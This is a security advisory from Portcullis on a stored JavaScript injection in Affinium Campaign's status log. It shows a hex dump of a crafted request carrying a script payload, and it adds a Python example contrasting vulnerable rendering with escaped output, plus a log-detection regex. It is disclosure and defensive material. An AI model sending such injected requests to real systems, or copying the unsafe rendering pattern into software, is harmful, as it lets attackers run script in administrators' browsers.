Security Advisory 08-004 – Affinium Campaign’s status log web page is vulnerable to a second order JavaScript injection

Vulnerability Title:

The web application’s status log web page is vulnerable to a second order JavaScript injection.

Vulnerable System:

Affinium Campaign

Vulnerability discovery and development:

Portcullis Security Testing Services

Credit for Discovery:

Tim Brown – Portcullis Computer Security Ltd.

Affected Systems:

All known versions of Affinium Campaign; the vulnerability discovered was for version 7.2.1.0.55.

Details:

It is possible for an attacker to inject JavaScript into the web application, which is typically deployed in front of the listener server, by manipulating the requests sent by the web application’s ActiveX control; the control encapsulates binary data within an HTTP POST request to https://webserver/Campaign/CampaignListener. The status log records the requests made to the CampaignListener web page along with the results of those requests. Because the CampaignListener web page expects binary data, no attempt is made to validate the input before it is passed to the listener server. When an authenticated administrative user subsequently visits the status log web page, the JavaScript from the manipulated ActiveX control request is returned in the response. For example:

00000000 50 4f 53 54 20 2f 43 61 6d 70 61 69 67 6e 2f 43 |POST /Campaign/C|
00000010 61 6d 70 61 69 67 6e 4c 69 73 74 65 6e 65 72 3f |ampaignListener?|
00000020 43 6c 69 65 6e 74 49 44 3d 36 20 48 54 54 50 2f |ClientID=6 HTTP/|
00000030 31 2e 31 0d 0a 48 6f 73 74 3a 20 77 65 62 73 65 |1.1..Host: webse|
00000040 72 76 65 72 0d 0a 43 6f 6f 6b 69 65 3a 20 43 41 |rver..Cookie: CA|
00000050 4d 50 41 49 47 4e 53 45 53 53 49 4f 4e 49 44 3d |MPAIGNSESSIONID=|
00000060 48 57 57 43 54 4c 6d 58 59 54 64 6d 50 6e 68 50 |HWWCTLmXYTdmPnhP|
00000070 41 76 4a 59 54 78 66 54 73 76 41 6e 41 78 68 79 |AvJYTxfTsvAnAxhy|
00000080 54 5a 50 7a 6b 34 6a 43 47 38 47 52 44 51 57 6b |TZPzk4jCG8GRDQWk|
00000090 42 36 6e 5a 21 37 30 37 36 33 30 32 33 39 0d 0a |B6nZ!707630239..|
000000a0 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 |Content-Length: |
000000b0 32 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 |291..Content-Typ|
000000c0 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 |e: multipart/for|
000000d0 6d 2d 64 61 74 61 0d 0a 0d 0a 1f 01 00 00 01 00 |m-data..........|
000000e0 02 07 0c 00 00 00 01 01 00 00 00 03 00 00 00 12 |................|
000000f0 0c 00 00 00 75 6e 69 63 61 5f 61 63 73 76 72 00 |....unica_acsvr.|
00000100 12 73 00 00 00 3c 73 63 72 69 70 74 3e 61 6c 65 |.s...<script>ale|
00000110 72 74 28 27 78 73 73 27 29 3c 2f 73 63 72 69 70 |rt('xss')</scrip|
00000120 74 3e 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |t>AAAAAAAAAAAAAA|
00000130 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 |AAAAAAAAAAAAAAAA|
*
00000170 41 41 41 41 41 41 41 00 04 2a 00 00 00 0e f2 95 |AAAAAAA..*....ò.|
00000180 47 51 57 f2 00 00 00 00 00 14 00 00 00 01 29 d5 |GQWò..........)Õ|
00000190 1b 4f 5f 75 72 f9 00 66 3c 62 8a b8 d6 c3 a6 4f |.O_urù.f<b.¸ÖæO|
000001a0 63 00 00 00 00 00 00 12 0b 00 00 00 70 61 72 74 |c...........part|
000001b0 69 74 69 6f 6e 31 00 12 00 00 00 00 12 0e 00 00 |ition1..........|
000001c0 00 31 32 30 31 30 30 37 38 37 31 32 39 38 00 05 |.1201007871298..|
000001d0 01 00 00 00 00 00 00 00 05 01 00 00 00 00 00 00 |................|
000001e0 00 05 01 00 00 00 02 00 00 00 12 03 00 00 00 2d |...............-|
000001f0 6c 00 12 06 00 00 00 65 6e 5f 55 53 00 0d 0a |l......en_US...|

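
The following Python example is added here to illustrate the bug class described above; it is not Affinium Campaign code and not Portcullis code. It models a hypothetical status-log viewer that renders stored request bodies into HTML: render_entry_unsafe splices the logged bytes into the page verbatim (the vulnerable pattern, where a stored <script> element becomes live when an administrator views the log), render_entry_safe shows non-printable bytes as \xNN and HTML-escapes the text at the point of output, and contains_markup flags stored entries that carry HTML tags so that existing logs can be reviewed for injected content. The sample entry is constructed from bytes visible in the dump above; all function names are this example's own.

```python
"""Hypothetical status-log viewer: vulnerable rendering beside hardened rendering.

Not Affinium Campaign code. The log field holds a raw binary request body, so the
viewer must treat it as untrusted data and encode it for HTML at output time.
"""
import html
import re

# Constructed sample: a fragment of the binary POST body from the advisory's
# hex dump (length-prefixed field name, then the injected payload and padding).
SAMPLE_ENTRY = (
    b"\x12\x0c\x00\x00\x00unica_acsvr\x00"
    b"\x12s\x00\x00\x00<script>alert('xss')</script>" + b"A" * 16
)


def render_entry_unsafe(raw: bytes) -> str:
    """Vulnerable pattern: decode the stored bytes and splice them into markup
    unchanged. A '<script>' element inside the logged request body is emitted as
    real markup, so it executes in the browser of whoever views the status log
    (second-order / stored JavaScript injection)."""
    return "<pre>" + raw.decode("latin-1") + "</pre>"


def render_entry_safe(raw: bytes) -> str:
    """Hardened pattern: the log field is data, never markup. Non-printable bytes
    are shown as \\xNN so the binary framing stays readable, and the whole string
    is HTML-escaped at the point of output, so '<' can never open a tag and quotes
    cannot break out of an attribute if the value is later placed in one."""
    text = "".join(
        chr(b) if 0x20 <= b < 0x7F else f"\\x{b:02x}" for b in raw
    )
    return "<pre>" + html.escape(text, quote=True) + "</pre>"


# Loose tag pattern: '<', optional '/', a tag name, then anything up to '>'.
TAG_RE = re.compile(rb"<\s*/?\s*[a-zA-Z][^>]*>")


def contains_markup(raw: bytes) -> bool:
    """Detection helper for reviewing existing logs: a payload that the protocol
    defines as binary framing should not contain HTML tags; if it does, the entry
    deserves a closer look."""
    return TAG_RE.search(raw) is not None


if __name__ == "__main__":
    print("UNSAFE :", render_entry_unsafe(SAMPLE_ENTRY))
    print("SAFE   :", render_entry_safe(SAMPLE_ENTRY))
    print("markup present in stored entry:", contains_markup(SAMPLE_ENTRY))
```

The important design point is that escaping happens where the value is written into HTML, not where it is stored: the listener protocol legitimately carries arbitrary bytes, so input validation at CampaignListener cannot be the fix, and any viewer that later displays those bytes must encode them for its own output context.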
Impact:

An attacker would use this to execute malicious code on the computers of visitors to the status log page.

Exploit:

Exploit code is not required.

Vendor Status:

05/06/2008 – Vendor informed

10/06/2008 – Vendor updated

11/06/2008 – Vendor responded via email

16/07/2008 – Vendor confirmed patches

Copyright:

Copyright © Portcullis Computer Security Limited 2008, All rights reserved worldwide.
Permission is hereby granted for the electronic redistribution of this information. It is not to be edited or altered in any way without the express written consent of Portcullis Computer Security Limited.

Disclaimer:

The information herein contained may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user’s risk. In no event shall the author/distributor (Portcullis Computer Security Limited) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.